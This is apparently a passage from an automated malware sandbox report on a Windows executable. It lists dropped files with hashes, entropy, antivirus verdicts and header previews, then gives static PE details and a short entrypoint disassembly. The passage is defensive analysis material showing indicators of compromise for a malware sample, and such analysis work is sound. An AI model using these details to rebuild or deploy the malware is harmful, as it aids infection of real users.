                                                                                                        SHA-512:54B070D4ECF54B3B45FA793DD8F0FE5F0D29299B9CFD9FC22F1CBF7077FABBA777BB11F9F7E78C38030188A1DF5FB16D45DC77A940370BE9BC6CC754A331B120
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:MDMP....... .......%;.e.........................................#..........T.......8...........T...........................................................................................................U...........B......0.......GenuineIntelW...........T...........$;.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C09.tmp.WERInternalMetadata.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8320
                                                                                                        Entropy (8bit):3.690376281194449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNiuA6h76YpKSU/egmfrSLi+pDa89b/YsfO1m:RrlsNiZ6h76YESU/egmfrSLl/Lfd
                                                                                                        MD5:883C87A071EFAA03C9F599AEBEB97320
                                                                                                        SHA1:C53B3125BD50152144234C39FD51D22ABC12A6CE
                                                                                                        SHA-256:A4787BCFE4C1831119C5F00C118427DB5025DCF80B1061C960C51B2FCCC5EC63
                                                                                                        SHA-512:AE5A3C15C624C771C9128070B4E4FD410B469D95A5D2D83949793C04B5F5C4CFA77A8AF94771B9590B0370E629D95906C855936DD716550062172038A052DDBA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.1.2.<./.P.i.d.>.......

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C29.tmp.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4622
                                                                                                        Entropy (8bit):4.415667729632023
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zsNJgtWI9isWgc8sqYjV8fm8M4JQ76FTN+q8vh7u63apPu9d:uITfntFgrsqYuJa2KJl3ahu9d
                                                                                                        MD5:B6A90F7F7F2C22A83AFB4139A7B9A240
                                                                                                        SHA1:3ED10CF7BFF596298F81EF29AE8C868CC37991F4
                                                                                                        SHA-256:3E8AE0DF69E149A0EFB605A4E09101A8BD032FDA2E206D4C9046E3FB5D5E145B
                                                                                                        SHA-512:ACBD0291A60568C6E6389A85C027C87A815D7751A5DD962A2F184C5E63BE92FA7DE97164A0ACD0E98024F47B4600BB5101CAF61FCBF80427CB26AE980599032C
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2245033" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\46A3.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\46A3.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1362
                                                                                                        Entropy (8bit):5.346977539202287
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLU84qpE4KI2KDE4KhKYIqDcfJKhuE4pqJE4klEE46k6AE4KIb:Mgv2HKI2YHKhBUouHkJHklEH6wHKY
                                                                                                        MD5:08121FC2C27784C587C3AE5926E51DDC
                                                                                                        SHA1:1BC421D1073F5D5F44B17783EF1234766AE9411D
                                                                                                        SHA-256:C2AE3A7704576F73616A2EBE9698501B7CCD2E6DC466E2CD9DCAB167D0E5872F
                                                                                                        SHA-512:D1DA8E67B6A3C15D99280296C08F47D9BB9BF22A05ABC8A36E08B59697F624718A3EA3DD3EA39DAD363279C8B7361CF5B5A0071644612AF04B9314E3291F4853
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\b6866d120f1141e4ed1a9336885d9b88\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\89672248685841ebbef19edc0e2fb2bf\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, Publi

                                                                                                        C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                        Download File
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):984
                                                                                                        Entropy (8bit):5.227423502376633
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                                                                                        MD5:D9512E54D33D06E68E0C0D36726F7776
                                                                                                        SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                                                                                        SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                                                                                        SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                                                                                        Malicious:false
                                                                                                        Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}

                                                                                                        C:\Users\user\AppData\Local\Temp\46A3.exe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3413536
                                                                                                        Entropy (8bit):7.252446325799637
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:tn37OXnskBCIZCtnLi3R8CzA1+g50U7PKDR/9QKiG7PrznN:ti4Li3R8sE+g5x2t/9/T9
                                                                                                        MD5:4527E3FE757DD266980F572C43F22EF3
                                                                                                        SHA1:BBA8BAE79D53F6B3DB43E82C85D0090B7934C8F6
                                                                                                        SHA-256:C5DC9C7BA82D0573EAD80F7174706AD1A5432616CE5602D1EC7F778F910136B7
                                                                                                        SHA-512:984179C7E0FFCDAB3D4E8C67ECA21918D61D06EC68CE1529BA21BF4C4E839BB05CDBD9B6A69BC7424C459650DA7D9813980765E4E25AE2A11ECE64A428EC41DD
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\46A3.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P...1...........1.. ....2...@.. ........................3......p4...@...................................1.K.....2...............3. .....3.....k.1.............................................. ............... ..H............text...$.1.. ....1................. ..`.rsrc.........2.......1.............@..@.reloc........3.......3.............@..B..................1.....H.......hD..............h..... .........................................:+.(..5E.(....*.V+.(.,.?..(....8.....*..B+.(..J:~.......*...6+.(f.6a~....*...0..........+.(*.Me8........E..../...K...k...J...8*...s.........8....s......... .....9....&8....s......... .....:....&8....*s......... .....:....& ....8....s......... ....8l....0..Z.......+.(.W0\ ........8........E....'.......8"....~....o...... ....(....9....&8....8....8......*...0..M.......+.(.FkK8/.......E........8....8.... ....

                                                                                                        C:\Users\user\AppData\Local\Temp\BB04.exe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):624640
                                                                                                        Entropy (8bit):6.987560195168364
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:tAtOTnK5dEXnMCyoW32HcBW4s1TojHZPT/GLVjUohlQ3xIKrgWGvx:tDT4O4v3c6WjToj5PT+LpUo+uM8x
                                                                                                        MD5:59E6F40D24C3EA84FA3BCF55B8F72C9D
                                                                                                        SHA1:FDFEDD5EF39F2325963EFE774240998D1BE6CACD
                                                                                                        SHA-256:433066AFD2579211323F9FE6AC6945B354B5422CAF932DABE4F9101BF6C71AD3
                                                                                                        SHA-512:54A08BAE9ECE1FCCB6E4D9BBC50E0D3BBB2E165A5E484A345E9BC5F2DE9AEDA0DA41C5737FA7F9B8E5BEBE957F69604C6B09CD452C4036958631C8461B83D894
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=j.hy.~;y.~;y.~;.y}:r.~;.y{:..~;.yz:m.~;6wz:h.~;.y.:p.~;y..;..~;6w{:G.~;6w}:o.~;.w{:x.~;.w~:x.~;.w.;x.~;.w|:x.~;Richy.~;........................PE..L.....e...............".x...........b............@.......................................@.........................p...P.......d...............................h.......................................@............................................text....v.......x.................. ..`.rdata...............|..............@..@.data....e...0...Z..................@....rsrc................l..............@..@.reloc..h............n..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\46A3.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):760320
                                                                                                        Entropy (8bit):6.561572491684602
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                                                                                        MD5:544CD51A596619B78E9B54B70088307D
                                                                                                        SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                                                                                        SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                                                                                        SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: PS05spA6ci.exe, Detection: malicious, Browse
                                                                                                        • Filename: indicat.exe, Detection: malicious, Browse
                                                                                                        • Filename: SaluC9P2HK.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: indicat.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: rj51W7g00R.exe, Detection: malicious, Browse
                                                                                                        • Filename: UIB9S0uVzu.exe, Detection: malicious, Browse
                                                                                                        • Filename: egNeejjND4.exe, Detection: malicious, Browse
                                                                                                        • Filename: toolspub1.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\wfshtit

                                                                                                        Download File
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):302592
                                                                                                        Entropy (8bit):5.3783462577478724
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:2mq54YSvS5AaUV0uwppkvfoGnG7j3J+gHzp0h924A5DMlY:w54FvUAaUVippUfoImDwozWIi
                                                                                                        MD5:9E0025C871AE4E48587BDEC5AA9E8778
                                                                                                        SHA1:435035CF548DDA47C159A553828C3DD23E5CDA07
                                                                                                        SHA-256:BDA02FB8758DE2721D45B4E65C94BC281718B96F031F0C4E986972451F476977
                                                                                                        SHA-512:04C870BBA95CA4D7173572BBB5F723E90332EA4DDBF1C0B782DE3CD47C0764C7258D2A2761AAEC9870F289053AE2A13BF038A24E554D84A7F999EBC525B3038B
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nX..nX..nXS..X..nX...X.nX...X..nX...X.nX...X.nX..oXG.nX...X..nX...X..nX...X..nXRich..nX................PE..L.....c............................aZ............@............................................................................P....@.. ...........................................................@D..@............................................text...0........................... ..`.data...,x.......>..................@....rsrc... ....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\AppData\Roaming\wfshtit:Zone.Identifier

                                                                                                        Download File
                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26
                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:true
                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):5.3783462577478724
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:file.exe
                                                                                                        File size:302'592 bytes
                                                                                                        MD5:9e0025c871ae4e48587bdec5aa9e8778
                                                                                                        SHA1:435035cf548dda47c159a553828c3dd23e5cda07
                                                                                                        SHA256:bda02fb8758de2721d45b4e65c94bc281718b96f031f0c4e986972451f476977
                                                                                                        SHA512:04c870bba95ca4d7173572bbb5f723e90332ea4ddbf1c0b782de3cd47c0764c7258d2a2761aaec9870f289053ae2a13bf038a24e554d84a7f999ebc525b3038b
                                                                                                        SSDEEP:3072:2mq54YSvS5AaUV0uwppkvfoGnG7j3J+gHzp0h924A5DMlY:w54FvUAaUVippUfoImDwozWIi
                                                                                                        TLSH:52549E1272E0EC31E4625A325D39C1E4776EBCD29E6967DB33583F3B49701E19A62B03
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nX..nX..nXS..X..nX...X..nX...X..nX...X..nX...X..nX..oXG.nX...X..nX...X..nX...X..nXRich..nX................PE..L......c...

                                                                                                        File Icon

                                                                                                        Icon Hash:4555a1a950554551

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x405a61
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x63B7EBDE [Fri Jan 6 09:37:34 2023 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:1
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:1
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:1
                                                                                                        Import Hash:775c7d434cffd499e537a34db4132a29

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        call 00007FB8A09D57CFh
                                                                                                        jmp 00007FB8A09D073Eh
                                                                                                        mov edi, edi
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 20h
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 00000008h
                                                                                                        pop ecx
                                                                                                        mov esi, 00401334h
                                                                                                        lea edi, dword ptr [ebp-20h]
                                                                                                        rep movsd
                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                        mov eax, dword ptr [ebp+0Ch]
                                                                                                        pop edi
                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                        pop esi
                                                                                                        test eax, eax
                                                                                                        je 00007FB8A09D08BEh
                                                                                                        test byte ptr [eax], 00000008h
                                                                                                        je 00007FB8A09D08B9h
                                                                                                        mov dword ptr [ebp-0Ch], 01994000h
                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                        push eax
                                                                                                        push dword ptr [ebp-10h]
                                                                                                        push dword ptr [ebp-1Ch]
                                                                                                        push dword ptr [ebp-20h]
                                                                                                        call dword ptr [0040112Ch]
                                                                                                        leave
                                                                                                        retn 0008h
                                                                                                        sub eax, 000003A4h
                                                                                                        je 00007FB8A09D08D4h
                                                                                                        sub eax, 04h
                                                                                                        je 00007FB8A09D08C9h
                                                                                                        sub eax, 0Dh
                                                                                                        je 00007FB8A09D08BEh
                                                                                                        dec eax
                                                                                                        je 00007FB8A09D08B5h
                                                                                                        xor eax, eax
                                                                                                        ret
                                                                                                        mov eax, 00000404h
                                                                                                        ret
                                                                                                        mov eax, 00000412h
                                                                                                        ret
                                                                                                        mov eax, 00000804h
                                                                                                        ret
                                                                                                        mov eax, 00000411h
                                                                                                        ret
                                                                                                        mov edi, edi
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        mov esi, eax
                                                                                                        push 00000101h
                                                                                                        xor edi, edi
                                                                                                        lea eax, dword ptr [esi+1Ch]
                                                                                                        push edi
                                                                                                        push eax
                                                                                                        call 00007FB8A09D1708h
                                                                                                        xor eax, eax
                                                                                                        movzx ecx, ax
                                                                                                        mov eax, ecx
                                                                                                        mov dword ptr [esi+04h], edi
                                                                                                        mov dword ptr [esi+08h], edi
                                                                                                        mov dword ptr [esi+0Ch], edi
                                                                                                        shl ecx, 10h
                                                                                                        or eax, ecx
                                                                                                        lea edi, dword ptr [esi+10h]
                                                                                                        stosd
                                                                                                        stosd
                                                                                                        stosd
                                                                                                        mov ecx, 0043C060h
                                                                                                        add esp, 0Ch
                                                                                                        lea eax, dword ptr [esi+1Ch]
                                                                                                        sub ecx, esi
                                                                                                        mov edi, 00000101h

                                                                                                        Rich Headers

                                                                                                        Programming Language:
                                                                                                        • [ASM] VS2010 build 30319
                                                                                                        • [ C ] VS2010 build 30319
                                                                                                        • [C++] VS2010 build 30319
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [RES] VS2010 build 30319
                                                                                                        • [LNK] VS2010 build 30319

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a7940x50.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e840000xb620.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44400x40.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f4.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x3a3300x3a400False0.5109140289699571data5.62022260267537IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .data0x3c0000x1e4782c0x3e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x1e840000xb6200xb800False0.373832370923913data4.048235054963272IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        AFX_DIALOG_LAYOUT0x1e8bb200x2data5.0
                                                                                                        AFX_DIALOG_LAYOUT0x1e8bb280x2data5.0
                                                                                                        AFX_DIALOG_LAYOUT0x1e8bb300x2data5.0
                                                                                                        AFX_DIALOG_LAYOUT0x1e8bb380x2data5.0
                                                                                                        JASUZAHAVOWECAYEDEVIDAVETUNAGU0x1e8b5000x61eASCII text, with very long lines (1566), with no line terminators0.6136653895274585
                                                                                                        RT_CURSOR0x1e8bb400x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
                                                                                                        RT_CURSOR0x1e8bc880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                        RT_CURSOR0x1e8bdb80xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.44583333333333336
                                                                                                        RT_CURSOR0x1e8bea80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.0877110694183865
                                                                                                        RT_CURSOR0x1e8cf800x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4473684210526316
                                                                                                        RT_CURSOR0x1e8d0b00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.4625
                                                                                                        RT_CURSOR0x1e8d1a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.08583489681050657
                                                                                                        RT_CURSOR0x1e8e2780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3407039711191336
                                                                                                        RT_ICON0x1e846800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.26649377593360996
                                                                                                        RT_ICON0x1e86c280x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.31475409836065577
                                                                                                        RT_ICON0x1e875d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6574909747292419
                                                                                                        RT_ICON0x1e87e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4787344398340249
                                                                                                        RT_ICON0x1e8a4280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.5039868667917449
                                                                                                        RT_STRING0x1e8ed500x2baMatlab v4 mat-file (little endian) K, numeric, rows 0, columns 00.4813753581661891
                                                                                                        RT_STRING0x1e8f0100x32edata0.47174447174447176
                                                                                                        RT_STRING0x1e8f3400x2dadata0.4712328767123288
                                                                                                        RT_GROUP_CURSOR0x1e8bc700x14data1.15
                                                                                                        RT_GROUP_CURSOR0x1e8eb200x14data1.25
                                                                                                        RT_GROUP_CURSOR0x1e8cf500x30data1.0
                                                                                                        RT_GROUP_CURSOR0x1e8e2480x30data1.0
                                                                                                        RT_GROUP_ICON0x1e8b4d00x30data0.9375
                                                                                                        RT_GROUP_ICON0x1e875b00x22data0.9705882352941176
                                                                                                        RT_VERSION0x1e8eb380x214data0.543233082706767

                                                                                                        Imports

                                                                                                        DLLImport
